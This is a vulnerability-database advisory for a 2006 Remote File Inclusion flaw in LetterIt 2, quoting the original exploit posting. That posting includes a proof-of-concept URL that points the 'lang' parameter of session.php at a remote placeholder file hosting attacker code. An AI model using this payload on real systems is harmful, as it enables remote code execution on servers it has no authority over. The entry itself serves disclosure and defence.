LetterIt (RFI)

vendor:

LetterIt

by:

v1per-haCker

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: LetterIt

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

LetterIt is vulnerable to a Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL can be used to execute arbitrary code on the vulnerable system. The malicious URL can be sent via a GET request to the vulnerable application. The vulnerable parameter is the 'lang' parameter in the 'session.php' file. An attacker can use this parameter to inject malicious code into the vulnerable application.

Mitigation:

The application should validate user input and filter out malicious code. The application should also use a whitelist of allowed characters and reject any input that does not match the whitelist.

Source

Exploit-DB raw data:

#==================================================================================
#  LetterIt (RFI)
#==================================================================================
# Info:-
#
# Scripts: LetterIt
# download : http://otterware.net/index.php?dl=45
# Version : 2
# Dork & vuln : download scripts and think :)
#
#=================================================================================
#Exploit :
#
#http://localhost/path/inc/session.php?sessionerror=0&lang=http://EvElCoDe.txt?
#
#=================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team               >>      www.xp10.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org
#
#Greetz to :    | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |
#               |  MuhaciR  |Skrmhcr-GVinux | Jean |
#
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com
#===================================================================================

# milw0rm.com [2006-11-09]